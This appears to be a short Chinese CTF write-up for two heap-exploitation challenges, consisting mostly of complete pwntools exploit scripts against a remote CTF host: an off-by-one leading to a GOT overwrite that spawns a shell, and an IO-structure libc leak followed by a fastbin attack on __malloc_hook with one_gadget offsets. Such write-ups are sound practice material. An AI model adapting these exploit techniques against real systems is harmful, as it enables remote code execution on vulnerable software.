題目質量很高萌新直接自閉
z這2道題都挺基礎的
easy_heap
exp:
off by one 造成了任意地址寫的漏洞
#!/usr/bin/python2
from pwn import *
p=0
def pwn():
global p
#p=process('./pwn')
p=remote('ha1cyon-ctf.fun',30179)
elf=ELF('./pwn')
libc=elf.libc
sla=lambda data,data1:p.sendlineafter('%s'%(data),data1)
sda=lambda data,data1:p.sendafter('%s'%(data),data1)
def add(size,data):
sla(' :','1')
sla(' : ',str(size))
sla(':',data)
def edit(idx,data):
sla(' :','2')
sla(' :',str(idx))
sda(': ',data)
def show(idx):
sla(' :','3')
sla(' :',str(idx))
def delete(idx):
sla(' :','4')
sla(' :',str(idx))
add(0x18,'\x02'*2)#0
add(0x18,'\x03'*3)#1
add(0x18,'/bin/sh\x00')#2
edit(0,'a'*0x18+'\x41')
delete(1)
payload='a'*0x10+p64(0)+p64(0x21)+p64(0x100)+p64(elf.got['free'])
add(0x38,payload)
show(1)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['free']
system=libcbase+libc.sym['system']
edit(1,p64(system))
delete(2)
p.interactive()
if __name__=="__main__":
pwn()
BAD GUY
通過寫IO結構體拿到libc地址然後就是正常的fastbin attack
exp:
from pwn import *
p=0
def pwn(ip,port,debug):
global p
if debug==1:
p=process('./pwn1')
elf=ELF('./pwn1')
libc=elf.libc
else:
p=remote(ip,port)
elf=ELF('./pwn1')
libc=elf.libc
sla=lambda data,data1:p.sendlineafter('%s'%(data),data1)
sda=lambda data,data1:p.sendafter('%s'%(data),data1)
def add(idx,size,data):
sla('>> ','1')
sla(' :',str(idx))
sla(': ',str(size))
sda(':',data)
def edit(idx,size,data):
sla('>> ','2')
sla(' :',str(idx))
sla(': ',str(size))
sda(': ',data)
def delete(idx):
sla('>> ','3')
sla(' :',str(idx))
add(0,0x18,'\x02'*2)
add(1,0x28,'\x03'*3)
add(2,0x68,'\x04'*4)
add(3,0x18,'\x05'*5)
add(4,0x68,'\x06'*6)
add(5,0x28,'\x07'*7)
payload='a'*0x18+p64(0xa1)
edit(0,len(payload),payload)
delete(1)
delete(2)
add(1,0x28,'\x08'*8)
payload='a'*0x20+p64(0)+p64(0x71)+'\xdd\x25'
edit(1,len(payload),payload)
add(6,0x68,'dd')
add(7,0x68,'\x00'*0x33+p64(0xfbad3c80)+3*p64(0)+p8(0))
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-3954176
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget=libcbase+o_g[1]
malloc_hook=libcbase+libc.sym['__malloc_hook']
realloc=libcbase+libc.sym['__libc_realloc']
delete(4)
payload='a'*0x18+p64(0x71)+p64(malloc_hook-0x23)
edit(3,len(payload),payload)
log.success('libcbase: '+hex(libcbase))
add(2,0x68,'dodou')
add(8,0x68,'a'*11+p64(one_gadget)+p64(realloc+9))
sla('>> ','1')
sla(' :',str(10))
sla(': ',str(2))
p.interactive()
return True
if __name__=='__main__':
while 1:
try:
if pwn('ha1cyon-ctf.fun',30215,0)==True:
break
except Exception as e:
p.close()
continue